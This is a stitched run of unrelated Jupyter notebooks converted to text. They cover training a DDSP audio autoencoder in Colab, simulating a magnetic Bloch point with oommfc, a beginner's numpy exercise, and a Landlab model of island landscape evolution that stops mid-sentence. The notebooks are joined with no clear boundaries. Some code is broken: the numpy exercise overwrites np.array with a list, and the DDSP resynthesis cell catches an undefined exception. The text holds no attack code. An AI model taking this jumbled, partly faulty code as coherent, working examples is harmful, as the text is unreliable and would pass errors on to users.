# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
###Output
_____no_output_____
###Markdown
Train a DDSP Autoencoder on GPUThis notebook demonstrates how to install the DDSP library and train it for synthesis based on your own data using our command-line scripts. If run inside of Colab, it will automatically use a free Google Cloud GPU.At the end, you'll have a custom-trained checkpoint that you can download to use with the [DDSP Timbre Transfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb). **Note that we prefix bash commands with a `!` inside of Colab, but you would leave them out if running directly in a terminal.** Install DependenciesFirst we install the required dependencies with `pip`.
###Code
%tensorflow_version 2.x
!pip install -qU ddsp[data_preparation]
# Initialize global path for using google drive.
DRIVE_DIR = ''
###Output
_____no_output_____
###Markdown
Setup Google Drive (Optional, Recommeded)This notebook requires uploading audio and saving checkpoints. While you can do this with direct uploads / downloads, it is recommended to connect to your google drive account. This will enable faster file transfer, and regular saving of checkpoints so that you do not lose your work if the colab kernel restarts (common for training more than 12 hours). Login and mount your driveThis will require an authentication code. You should then be able to see your drive in the file browser on the left panel.
###Code
from google.colab import drive
drive.mount('/content/drive')
###Output
_____no_output_____
###Markdown
Set your base directory* In drive, put all of the audio (.wav, .mp3) files with which you would like to train in a single folder. * Typically works well with 10-20 minutes of audio from a single monophonic source (also, one acoustic environment). * Use the file browser in the left panel to find a folder with your audio, right-click **"Copy Path", paste below**, and run the cell.
###Code
#@markdown (ex. `/content/drive/My Drive/...`) Leave blank to skip loading from Drive.
DRIVE_DIR = '' #@param {type: "string"}
import os
assert os.path.exists(DRIVE_DIR)
print('Drive Folder Exists:', DRIVE_DIR)
###Output
_____no_output_____
###Markdown
Make directories to save model and data
###Code
AUDIO_DIR = 'data/audio'
AUDIO_FILEPATTERN = AUDIO_DIR + '/*'
!mkdir -p $AUDIO_DIR
if DRIVE_DIR:
SAVE_DIR = os.path.join(DRIVE_DIR, 'ddsp-solo-instrument')
else:
SAVE_DIR = '/content/models/ddsp-solo-instrument'
!mkdir -p "$SAVE_DIR"
###Output
_____no_output_____
###Markdown
Prepare Dataset Upload training audioUpload audio files to use for training your model. Uses `DRIVE_DIR` if connected to drive, otherwise prompts local upload.
###Code
import glob
import os
from ddsp.colab import colab_utils
if DRIVE_DIR:
mp3_files = glob.glob(os.path.join(DRIVE_DIR, '*.mp3'))
wav_files = glob.glob(os.path.join(DRIVE_DIR, '*.wav'))
audio_files = mp3_files + wav_files
else:
audio_files, _ = colab_utils.upload()
for fname in audio_files:
target_name = os.path.join(AUDIO_DIR,
os.path.basename(fname).replace(' ', '_'))
print('Copying {} to {}'.format(fname, target_name))
!cp "$fname" $target_name
###Output
_____no_output_____
###Markdown
Preprocess raw audio into TFRecord datasetWe need to do some preprocessing on the raw audio you uploaded to get it into the correct format for training. This involves turning the full audio into short (4-second) examples, inferring the fundamental frequency (or "pitch") with [CREPE](http://github.com/marl/crepe), and computing the loudness. These features will then be stored in a sharded [TFRecord](https://www.tensorflow.org/tutorials/load_data/tfrecord) file for easier loading. Depending on the amount of input audio, this process usually takes a few minutes.* (Optional) Transfer dataset from drive. If you've already created a dataset, from a previous run, this cell will skip the dataset creation step and copy the dataset from `$DRIVE_DIR/data`
###Code
import glob
import os
TRAIN_TFRECORD = 'data/train.tfrecord'
TRAIN_TFRECORD_FILEPATTERN = TRAIN_TFRECORD + '*'
# Copy dataset from drive if dataset has already been created.
drive_data_dir = os.path.join(DRIVE_DIR, 'data')
drive_dataset_files = glob.glob(drive_data_dir + '/*')
if DRIVE_DIR and len(drive_dataset_files) > 0:
!cp "$drive_data_dir"/* data/
else:
# Make a new dataset.
if not glob.glob(AUDIO_FILEPATTERN):
raise ValueError('No audio files found. Please use the previous cell to '
'upload.')
!ddsp_prepare_tfrecord \
--input_audio_filepatterns=$AUDIO_FILEPATTERN \
--output_tfrecord_path=$TRAIN_TFRECORD \
--num_shards=10 \
--alsologtostderr
# Copy dataset to drive for safe-keeping.
if DRIVE_DIR:
!mkdir "$drive_data_dir"/
print('Saving to {}'.format(drive_data_dir))
!cp $TRAIN_TFRECORD_FILEPATTERN "$drive_data_dir"/
###Output
_____no_output_____
###Markdown
Save dataset statistics for timbre transferQuantile normalization helps match loudness of timbre transfer inputs to the loudness of the dataset, so let's calculate it here and save in a pickle file.
###Code
from ddsp.colab import colab_utils
import ddsp.training
data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_dataset(shuffle=False)
PICKLE_FILE_PATH = os.path.join(SAVE_DIR, 'dataset_statistics.pkl')
colab_utils.save_dataset_statistics(data_provider, PICKLE_FILE_PATH)
###Output
_____no_output_____
###Markdown
Let's load the dataset in the `ddsp` library and have a look at one of the examples.
###Code
from ddsp.colab import colab_utils
import ddsp.training
from matplotlib import pyplot as plt
import numpy as np
data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_dataset(shuffle=False)
try:
ex = next(iter(dataset))
except StopIteration:
raise ValueError(
'TFRecord contains no examples. Please try re-running the pipeline with '
'different audio file(s).')
colab_utils.specplot(ex['audio'])
colab_utils.play(ex['audio'])
f, ax = plt.subplots(3, 1, figsize=(14, 4))
x = np.linspace(0, 4.0, 1000)
ax[0].set_ylabel('loudness_db')
ax[0].plot(x, ex['loudness_db'])
ax[1].set_ylabel('F0_Hz')
ax[1].set_xlabel('seconds')
ax[1].plot(x, ex['f0_hz'])
ax[2].set_ylabel('F0_confidence')
ax[2].set_xlabel('seconds')
ax[2].plot(x, ex['f0_confidence'])
###Output
_____no_output_____
###Markdown
Train ModelWe will now train a "solo instrument" model. This means the model is conditioned only on the fundamental frequency (f0) and loudness with no instrument ID or latent timbre feature. If you uploaded audio of multiple instruemnts, the neural network you train will attempt to model all timbres, but will likely associate certain timbres with different f0 and loudness conditions. First, let's start up a [TensorBoard](https://www.tensorflow.org/tensorboard) to monitor our loss as training proceeds. Initially, TensorBoard will report `No dashboards are active for the current data set.`, but once training begins, the dashboards should appear.
###Code
%reload_ext tensorboard
import tensorboard as tb
tb.notebook.start('--logdir "{}"'.format(SAVE_DIR))
###Output
_____no_output_____
###Markdown
We will now begin training. Note that we specify [gin configuration](https://github.com/google/gin-config) files for the both the model architecture ([solo_instrument.gin](TODO)) and the dataset ([tfrecord.gin](TODO)), which are both predefined in the library. You could also create your own. We then override some of the spefic params for `batch_size` (which is defined in in the model gin file) and the tfrecord path (which is defined in the dataset file). Training Notes:* Models typically perform well when the loss drops to the range of ~4.5-5.0.* Depending on the dataset this can take anywhere from 5k-30k training steps usually.* The default is set to 30k, but you can stop training at any time, and for timbre transfer, it's best to stop before the loss drops too far below ~5.0 to avoid overfitting.* On the colab GPU, this can take from around 3-20 hours. * We **highly recommend** saving checkpoints directly to your drive account as colab will restart naturally after about 12 hours and you may lose all of your checkpoints.* By default, checkpoints will be saved every 300 steps with a maximum of 10 checkpoints (at ~60MB/checkpoint this is ~600MB). Feel free to adjust these numbers depending on the frequency of saves you would like and space on your drive.* If you're restarting a session and `DRIVE_DIR` points a directory that was previously used for training, training should resume at the last checkpoint.
###Code
!ddsp_run \
--mode=train \
--alsologtostderr \
--save_dir="$SAVE_DIR" \
--gin_file=models/solo_instrument.gin \
--gin_file=datasets/tfrecord.gin \
--gin_param="TFRecordProvider.file_pattern='$TRAIN_TFRECORD_FILEPATTERN'" \
--gin_param="batch_size=16" \
--gin_param="train_util.train.num_steps=30000" \
--gin_param="train_util.train.steps_per_save=300" \
--gin_param="trainers.Trainer.checkpoints_to_keep=10"
###Output
_____no_output_____
###Markdown
ResynthesisCheck how well the model reconstructs the training data
###Code
from ddsp.colab.colab_utils import play, specplot
import ddsp.training
import gin
from matplotlib import pyplot as plt
import numpy as np
data_provider = ddsp.training.data.TFRecordProvider(TRAIN_TFRECORD_FILEPATTERN)
dataset = data_provider.get_batch(batch_size=1, shuffle=False)
try:
batch = next(iter(dataset))
except OutOfRangeError:
raise ValueError(
'TFRecord contains no examples. Please try re-running the pipeline with '
'different audio file(s).')
# Parse the gin config.
gin_file = os.path.join(SAVE_DIR, 'operative_config-0.gin')
gin.parse_config_file(gin_file)
# Load model
model = ddsp.training.models.Autoencoder()
model.restore(SAVE_DIR)
# Resynthesize audio.
audio_gen = model(batch, training=False)
audio = batch['audio']
print('Original Audio')
specplot(audio)
play(audio)
print('Resynthesis')
specplot(audio_gen)
play(audio_gen)
###Output
_____no_output_____
###Markdown
Download CheckpointBelow you can download the final checkpoint. You are now ready to use it in the [DDSP Timbre Tranfer Colab](https://colab.research.google.com/github/magenta/ddsp/blob/master/ddsp/colab/demos/timbre_transfer.ipynb).
###Code
from ddsp.colab import colab_utils
import tensorflow as tf
import os
CHECKPOINT_ZIP = 'my_solo_instrument.zip'
latest_checkpoint_fname = os.path.basename(tf.train.latest_checkpoint(SAVE_DIR))
!cd "$SAVE_DIR" && zip $CHECKPOINT_ZIP $latest_checkpoint_fname* operative_config-0.gin dataset_statistics.pkl
!cp "$SAVE_DIR/$CHECKPOINT_ZIP" ./
colab_utils.download(CHECKPOINT_ZIP)
###Output
_____no_output_____ |
examples/spatially-varying-parameters2.ipynb | ###Markdown
Spatially varying parameters 2In this notebook, one data point from Figure 2 in [Beg *et al.* Stable and manipulable Bloch point. *Scientific Reports*, **9**, 7959 (2019)](https://doi.org/10.1038/s41598-019-44462-2) is simulated.We need to relax a $150 \,\text{nm}$ disk, which consists of two layers with different sign of Dzyaloshinskii-Moriya constant $D$. The bottom layer with $D0$ has $10 \,\text{nm}$ thickness. We start by importing the necessary modules and creating the mesh with two regions.
###Code
import oommfc as mc
import discretisedfield as df
import micromagneticmodel as mm
d = 150e-9
hb = 20e-9
ht = 10e-9
cell = (5e-9, 5e-9, 2.5e-9)
subregions = {'r1': df.Region(p1=(-d/2, -d/2, -hb), p2=(d/2, d/2, 0)),
'r2': df.Region(p1=(-d/2, -d/2, 0), p2=(d/2, d/2, ht))}
p1 = (-d/2, -d/2, -hb)
p2 = (d/2, d/2, ht)
mesh = df.Mesh(p1=p1, p2=p2, cell=cell, subregions=subregions)
###Output
_____no_output_____
###Markdown
The mesh domain and the discretisation cells are:
###Code
mesh.k3d()
###Output
_____no_output_____
###Markdown
and the two regions we defined are:
###Code
mesh.k3d_subregions()
###Output
_____no_output_____
###Markdown
Now, we need to define the system object, and by setting magnetisation saturation, set the geometry to be a disk.
###Code
system = mm.System(name='bloch_point')
D = {'r1': 1.58e-3, 'r2': -1.58e-3, 'r1:r2': 1.58e-9}
Ms = 3.84e5
A = 8.78e-12
def Ms_fun(point):
x, y, z = point
if x**2 + y**2 <= (d/2)**2:
return Ms
else:
return 0
system.energy = mm.Exchange(A=A) + mm.DMI(D=D, crystalclass='T') + mm.Demag()
system.m = df.Field(mesh, dim=3, value=(0, 0, 1), norm=Ms_fun)
###Output
_____no_output_____
###Markdown
Our sample is now:
###Code
system.m.norm.k3d.nonzero()
###Output
_____no_output_____
###Markdown
Now, we can minimise the system's energy by using `MinDriver`.
###Code
md = mc.MinDriver()
md.drive(system)
###Output
Running OOMMF (ExeOOMMFRunner)[2022/02/25 18:18]... (2.3 s)
###Markdown
The out-of-plane magnetisation component ($m_{z}$) is now:
###Code
system.m.z.k3d.scalar(filter_field=system.m.norm)
###Output
_____no_output_____
###Markdown
We can see that two vortices with different orientation emerged. We can inspect this closer by plotting two layers of magnetisation in two different layers:
###Code
import k3d
plot = k3d.plot()
system.m.plane(z=-10e-9, n=(20, 20)).k3d.vector(plot=plot, color_field=system.m.z, head_size=30)
system.m.plane(z=5e-9, n=(20, 20)).k3d.vector(plot=plot,color_field=system.m.z, head_size=30)
plot.display()
###Output
_____no_output_____
###Markdown
We can now plot another cross section and see that the Bloch point emerged.
###Code
@df.interact(y=system.m.mesh.slider('y', continuous_update=False))
def my_plot(y):
system.m.plane(y=y).mpl(figsize=(10, 5), vector_kw={'scale': 1e7})
###Output
_____no_output_____ |
Abanoub.ipynb | ###Markdown
###Code
import numpy as np
print("Hello Mr.Abanoub")
!pip install numpy
x=np.my_array=([5, 9, 10, 18, 122, 14, 77])
print(x)
print(x[1:3])
print(x[2:7])
y=np.my_array=([[8, 8, 2, 11, 44, 99, 5],[8, 7, 1, 0, 22, 66, 8]])
print(y)
print(y[0:5])
print(y[0:3])
import numpy as np
Random=np.random.random((3,3))
print(Random)
print(Random[0:3])
import numpy as np
Zero= np.zeros([3,3])
print(Zero)
print("Yes")
import numpy as np
Pop=np.ones([4,4])
print(Pop)
import numpy as np
Abanoub = np. full((5,5),8)
print(Abanoub)
import numpy as np
ident=np.eye(2,2)
print(ident)
import numpy as np
x=np.array=([[5, 10, 10, 20, 25, 30],[25, 45, 60, 55, 80, 99]])
y=np.array=([[2, 3, 8, 9, 5, 7],[8, 4, 2, 1, 3, 6]])
print(x)
print(y)
print(np.add(x,y))
print(np.subtract(x,y))
print(np.divide(y,x))
print(np.multiply(x,y))
print(np.sqrt((x)))
print(x)
x_new=np.sqrt(x)
y_new=np.divide(x,y)
print(x_new)
print(y_new)
z=np.multiply(x_new,y_new)
print(z)
import numpy as np
#Define an array of np's
My_Array= np.array=([10, 5, 9, 7])
print(My_Array)
print(type(My_Array))
print(My_Array.count)
print(My_Array[0])
My_Array[2]=80
print(My_Array[2])
print(My_Array[3])
import numpy as np
arr=np.array=([[5,6],[2, 4]])
v=np.array=([[5, 2],[3, 5, 9]])
print(v)
###Output
[[5, 2], [3, 5, 9]]
|
DV - Data Visualizations with Plotly/02.Using Scenarios with Plotly/02.02.Plotly Express vs Graph_Objects.ipynb | ###Markdown
`Plotly Express` vs `Graph_Objects` (go)* `Plotly Express` is new high level framework released in 2019.* However for some cases, we might still want to use old framework `Graph_Objects (go)`So we need to understand what is the differences between them.
###Code
import plotly.express as px
import plotly.graph_objects as go
iris = px.data.iris()
iris.head()
###Output
_____no_output_____
###Markdown
Graphing with `plotly.express`
###Code
iris.columns
fig = px.scatter(iris, 'sepal_width', 'sepal_length', title='Sepal Width vs Sepal Lenght')
fig.show()
print(fig)
###Output
Figure({
'data': [{'hovertemplate': 'sepal_width=%{x}<br>sepal_length=%{y}<extra></extra>',
'legendgroup': '',
'marker': {'color': '#636efa', 'symbol': 'circle'},
'mode': 'markers',
'name': '',
'orientation': 'v',
'showlegend': False,
'type': 'scatter',
'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. ,
4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5,
3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3,
3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8,
3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5,
3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7,
3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9,
2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7,
3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2,
2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1,
3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]),
'xaxis': 'x',
'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3,
5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2,
5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5,
4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7,
6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6,
5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. ,
5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2,
5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4,
6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2,
6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9,
6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9]),
'yaxis': 'y'}],
'layout': {'legend': {'tracegroupgap': 0},
'template': '...',
'title': {'text': 'Sepal Width vs Sepal Lenght'},
'xaxis': {'anchor': 'y', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_width'}},
'yaxis': {'anchor': 'x', 'domain': [0.0, 1.0], 'title': {'text': 'sepal_length'}}}
})
###Markdown
------- Graphing with `graph_objects`
###Code
fig = go.Figure(data=go.Scatter(x=iris['sepal_width'],
y=iris['sepal_length'],
mode='markers'))
fig.update_layout(
title='Sepal Width vs Sepal Length',
xaxis_title='sepal_width',
yaxis_title='sepal_length'
)
fig.show()
print(fig)
###Output
Figure({
'data': [{'mode': 'markers',
'type': 'scatter',
'x': array([3.5, 3. , 3.2, 3.1, 3.6, 3.9, 3.4, 3.4, 2.9, 3.1, 3.7, 3.4, 3. , 3. ,
4. , 4.4, 3.9, 3.5, 3.8, 3.8, 3.4, 3.7, 3.6, 3.3, 3.4, 3. , 3.4, 3.5,
3.4, 3.2, 3.1, 3.4, 4.1, 4.2, 3.1, 3.2, 3.5, 3.1, 3. , 3.4, 3.5, 2.3,
3.2, 3.5, 3.8, 3. , 3.8, 3.2, 3.7, 3.3, 3.2, 3.2, 3.1, 2.3, 2.8, 2.8,
3.3, 2.4, 2.9, 2.7, 2. , 3. , 2.2, 2.9, 2.9, 3.1, 3. , 2.7, 2.2, 2.5,
3.2, 2.8, 2.5, 2.8, 2.9, 3. , 2.8, 3. , 2.9, 2.6, 2.4, 2.4, 2.7, 2.7,
3. , 3.4, 3.1, 2.3, 3. , 2.5, 2.6, 3. , 2.6, 2.3, 2.7, 3. , 2.9, 2.9,
2.5, 2.8, 3.3, 2.7, 3. , 2.9, 3. , 3. , 2.5, 2.9, 2.5, 3.6, 3.2, 2.7,
3. , 2.5, 2.8, 3.2, 3. , 3.8, 2.6, 2.2, 3.2, 2.8, 2.8, 2.7, 3.3, 3.2,
2.8, 3. , 2.8, 3. , 2.8, 3.8, 2.8, 2.8, 2.6, 3. , 3.4, 3.1, 3. , 3.1,
3.1, 3.1, 2.7, 3.2, 3.3, 3. , 2.5, 3. , 3.4, 3. ]),
'y': array([5.1, 4.9, 4.7, 4.6, 5. , 5.4, 4.6, 5. , 4.4, 4.9, 5.4, 4.8, 4.8, 4.3,
5.8, 5.7, 5.4, 5.1, 5.7, 5.1, 5.4, 5.1, 4.6, 5.1, 4.8, 5. , 5. , 5.2,
5.2, 4.7, 4.8, 5.4, 5.2, 5.5, 4.9, 5. , 5.5, 4.9, 4.4, 5.1, 5. , 4.5,
4.4, 5. , 5.1, 4.8, 5.1, 4.6, 5.3, 5. , 7. , 6.4, 6.9, 5.5, 6.5, 5.7,
6.3, 4.9, 6.6, 5.2, 5. , 5.9, 6. , 6.1, 5.6, 6.7, 5.6, 5.8, 6.2, 5.6,
5.9, 6.1, 6.3, 6.1, 6.4, 6.6, 6.8, 6.7, 6. , 5.7, 5.5, 5.5, 5.8, 6. ,
5.4, 6. , 6.7, 6.3, 5.6, 5.5, 5.5, 6.1, 5.8, 5. , 5.6, 5.7, 5.7, 6.2,
5.1, 5.7, 6.3, 5.8, 7.1, 6.3, 6.5, 7.6, 4.9, 7.3, 6.7, 7.2, 6.5, 6.4,
6.8, 5.7, 5.8, 6.4, 6.5, 7.7, 7.7, 6. , 6.9, 5.6, 7.7, 6.3, 6.7, 7.2,
6.2, 6.1, 6.4, 7.2, 7.4, 7.9, 6.4, 6.3, 6.1, 7.7, 6.3, 6.4, 6. , 6.9,
6.7, 6.9, 5.8, 6.8, 6.7, 6.7, 6.3, 6.5, 6.2, 5.9])}],
'layout': {'template': '...',
'title': {'text': 'Sepal Width vs Sepal Length'},
'xaxis': {'title': {'text': 'sepal_width'}},
'yaxis': {'title': {'text': 'sepal_length'}}}
})
|
evolve_island_world_gmd2106.ipynb | ###Markdown
Evolve Island World*(Greg Tucker, University of Colorado Boulder, spring 2021)*(Version GMD2106)Demonstration of a Landlab-built simulation of the morphological evolution of a hypothetical island micro-continent.This version was configured to generate an illustration to accompany a manuscript by Tucker et al., submitted to Geoscientific Model Development in summer 2021. Set up and initialize
###Code
from landlab.io.native_landlab import load_grid, save_grid
from landlab import imshow_grid, RasterModelGrid
import time
import numpy as np
import matplotlib as mpl
import matplotlib.pyplot as plt
import copy
import cmocean
import datetime
###Output
_____no_output_____
###Markdown
Set parameters
###Code
# Parameters: subaerial erosion/transport/deposition
K_br = 1.0e-5 # fluvial erosion coefficient, 1/y
v_s = 1.0 # fluvial deposition parameter, -
# Parameters: submarine sediment transport
sea_level_delta = 0.4 # scale factor for random SL variation, m
wave_base = 50.0 # depth to wave base, m
marine_diff = 100.0 # marine sediment diffusivity, m2/y
# Parameters: tectonics and flexure
extension_rate = 0.01 # horizontal extension rate, m/y
fault_dip = 60.0 # surface fault dip, degrees
fault_location = 4.0e4 # location parameter for fault, m
detachment_depth = 1.0e4 # depth to decollement, m
effective_elastic_thickness = 1.0e4 # elastic thickness, m
crust_datum = -1.5e4 # depth to datum in crust, m
unit_wt = 2650.0 * 9.8 # unit weight of load, kg / m s2
# Parameters: numerics and run control
dt = 100.0 # time-step duration, y
num_iter = 2500 # number of iterations
plot_interval = 2000.0 # time interval for plotting, y
save_interval = 25000.0 # time interval for saving grid, y
ndigits = 3 # number of digits for output files
seed = 1 # random seed
# Parameters: plotting and display
max_elev_for_color_scale = 1650.0 # elevation for color scale in plotting, m
scale_fac_for_surface_water = 0.3 # surface water gets color equiv to -this times above scale, -
area_threshold = 5.0e7 # minimum drainage area for displayed streams, m2
# Derived or initial parameters
current_sea_level = 0.0
next_plot = plot_interval # next time to plot
next_save = save_interval # next time to save grid
frame_num = 0 # current output image frame number
save_num = 0 # current save file frame number
save_name = 'rift-island-save'
# Other initialization
np.random.seed(seed)
sea_level = [] # list of sea-level values over time
###Output
_____no_output_____
###Markdown
Load grid and topographyWe start with a previously generated hex grid. This grid includes a topography field that represents a quasi-circular oceanic plateau. We also want to record the perimeter node IDs so we can work with them later.
###Code
grid = load_grid('initial_island.grid')
z = grid.at_node['topographic__elevation']
perimeter_nodes = grid.status_at_node != grid.BC_NODE_IS_CORE
###Output
_____no_output_____
###Markdown
Display initial topography
###Code
cmap = copy.copy(mpl.cm.get_cmap("seismic"))
scale = np.amax(np.abs(z))
imshow_grid(grid, z, vmin=-scale, vmax=scale, cmap=cmap)
###Output
_____no_output_____
###Markdown
Create a raster grid for flexureThe 2D elastic lithosphere flexure component `Flexure` requires a raster grid (not hex). We will therefore define a separate raster grid for this operation. The grid has the same number of rows and columns as the hex grid, and the same spacing on the two axes. Theonly difference is that the hex grid has alternate rows offset by half a grid width. (Because we assume that the flexural wavelength is much longer than this, we don't bother interpolating between the grids.)
###Code
flex_rast_grid = RasterModelGrid((grid.number_of_node_rows,
grid.number_of_node_columns),
xy_spacing=(grid.spacing,
0.866 * grid.spacing))
###Output
_____no_output_____
###Markdown
Create grid fieldsIn addition to the `topographic__elevation` field, and the output fields created by the various Components, we need the following fields:- *Water surface elevation:* the "filled topography" field used by the flow routing and depression-filling algorithms (using a separate field allows us to fill depressions with water rather than raising the topographic elevations).- *Subaerial flag:* boolean field indicating whether a given node is above current relative sea level.- *Cumulative deposit thickness:* used to track the thickness of sediment and (where negative) cumulative exhumation.- *Upper crust thickness:* used in flexural isostasy calculations to keep track of the time- and space-varying load.- *Load:* the weight per unit area of rock/sediment (note: in this version we do not track water loading, though ultimately one should).
###Code
# Add field(s)
wse = grid.add_zeros('water_surface__elevation',
at='node',
clobber=True)
subaerial = grid.add_zeros('is_subaerial',
at='node',
dtype=bool,
clobber=True)
cum_depo = grid.add_zeros('cumulative_deposit_thickness',
at='node')
thickness = grid.add_zeros('upper_crust_thickness',
at='node')
load = flex_rast_grid.add_zeros(
'lithosphere__overlying_pressure_increment',
at='node'
)
###Output
_____no_output_____
###Markdown
Import ComponentsHere we import the Components needed for this model:- FlowAccumulator: handles subaerial routing of surface-water flow. Also creates a FlowDirectorSteepest and a LakeMapperBarnes.- ErosionDeposition: handles erosion and deposition by fluvial processes, using the Davy & Lague (2009) equations.- SimpleSubmarineDiffuser: transports sediment under water using diffusion with a coefficient that varies with local water depth.- ListricKinematicExtender: calculates tectonic extension on an idealized listric normal fault, with periodic horizontal shift of topography in the hangingwall.- Flexure: handles 2D elastic lithosphere flexure.
###Code
from landlab.components import (FlowAccumulator,
ErosionDeposition,
SimpleSubmarineDiffuser,
ListricKinematicExtender,
Flexure
)
###Output
_____no_output_____
###Markdown
Instantiate ComponentsNote that Flexure gets its own grid.
###Code
fa = FlowAccumulator(grid,
depression_finder='LakeMapperBarnes',
fill_surface=wse,
redirect_flow_steepest_descent=True,
reaccumulate_flow=True)
ed = ErosionDeposition(grid,
K=K_br,
v_s=v_s,
solver='adaptive')
sd = SimpleSubmarineDiffuser(grid,
sea_level=0.0,
wave_base=wave_base,
shallow_water_diffusivity=marine_diff)
ke = ListricKinematicExtender(grid,
extension_rate=extension_rate,
fault_dip=fault_dip,
fault_location=fault_location,
detachment_depth=detachment_depth,
track_crustal_thickness=True
)
fl = Flexure(flex_rast_grid,
eet=effective_elastic_thickness,
method='flexure'
)
###Output
_____no_output_____
###Markdown
Define sea level functionThis function adds or subtracts a random amount to the current sea level.
###Code
def sea_level_random(current_sea_level, delta):
return current_sea_level + delta * np.random.randn()
###Output
_____no_output_____
###Markdown
Set up flexure and tectonic subsidenceTo initialize calculation of flexural isostasy and rift-related subsidence, we need to calculate:- the starting crustal thickness (above the datum, which is arbitrary)- the load created by this thickness- the initial lithospheric deflection (calculated via a call to Flexure.update())We save this initial deflection, so that for each time step we can calculate the net deflection over time (in other words, the initial deflection is assumed to be "already accounted for" in the initial topography).We also create a shorthand variable, *cum_subs*, to access the cumulative subsidence field.
###Code
# Prepare flexure and tectonic subsidence
thickness[:] = z - crust_datum
load[:] = unit_wt * thickness
fl.update()
deflection = flex_rast_grid.at_node['lithosphere_surface__elevation_increment']
init_deflection = deflection.copy()
cum_subs = grid.at_node['cumulative_subsidence_depth']
# for tracking purposes
init_thickness = thickness.copy()
###Output
_____no_output_____
###Markdown
Create a display functionThis function displays the current topography, and saves a plot to file.
###Code
def display_island(grid, current_sea_level, frame_num, ndigits):
z = grid.at_node['topographic__elevation']
fa.run_one_step() # re-run flow router to update the water-surface height
wse = grid.at_node['water_surface__elevation']
fresh_water_elev_scale = -(scale_fac_for_surface_water
* max_elev_for_color_scale)
earth_sea = z - current_sea_level
area = grid.at_node['drainage_area']
is_channel_or_flooded = np.logical_or(area > area_threshold,
wse > z)
is_fresh_water = np.logical_and(is_channel_or_flooded,
earth_sea > 0.0)
earth_sea[is_fresh_water] = fresh_water_elev_scale
imshow_grid(grid, earth_sea,
cmap=cmocean.cm.topo,
vmin=-max_elev_for_color_scale,
vmax=max_elev_for_color_scale)
plt.axis(False)
plt.savefig('island' + str(frame_num).zfill(ndigits) + '.png')
###Output
_____no_output_____
###Markdown
Display the starting topographyCreate an image of the starting condition.
###Code
display_island(grid, 0.0, 0, ndigits)
###Output
_____no_output_____
###Markdown
Run Tectonics and flexureThe kinematic extender updates the cumulative subsidence created by the fact that the hangingwall is sliding down a listric ramp. The load is then calculated based on the current thickness minus what has been lost to subsidence (because subsidence comes from local thinning of the crust as the hangingwall slides by, in general replacing a thicker slice with a thinner one). The isostatic deflection is calculated based on the updated load. The topography is then updated by adding the thickness field to the crustal datum elevation, and subtracting the cumulative subsidence plus the isostatic subsidence (which in many places will be negative, i.e., isostatic uplift in response to tectonic and erosional thinning). Sea levelCurrent sea level is updated, and appended to the list to keep track of sea-level history. Subaerial and submarine nodes are identified based on the new sea level. Copying present topographyWe make a copy of the topography at this point in order to later calculate the *change* in topography due to erosion and sedimentation. Subaerial erosion and depositionIn order to restrict subaerial flow routing and fluvial erosion/deposition to land only, we change the boundary status such that all submarine nodes are flagged as boundary (fixed-value) nodes. We then run the flow-routing algorithms, followed by running the ErosionDeposition (fluvial) Component for one time step. Submarine erosion and depositionIn order to keep track of sediment delivered to the shoreline by rivers, we take the fluvial sediment-influx field, which is in m3/y, and convert it to a deposition rate by dividing by cell area. For submarine nodes, which were previously treated as boundaries and so were not updated for deposition, we now deposit this material by adding one time step's worth of deposition.We now apply submarine water-depth-dependent diffusion. This calculation will be applied to the entire grid, with an arbitrarily small diffusion coefficient applied to subaerial nodes. To enable this, we switch the boundary status of submarine nodes back to CORE, while keeping the perimeter nodes as open (fixed-value) boundaries. Cumulative erosion and 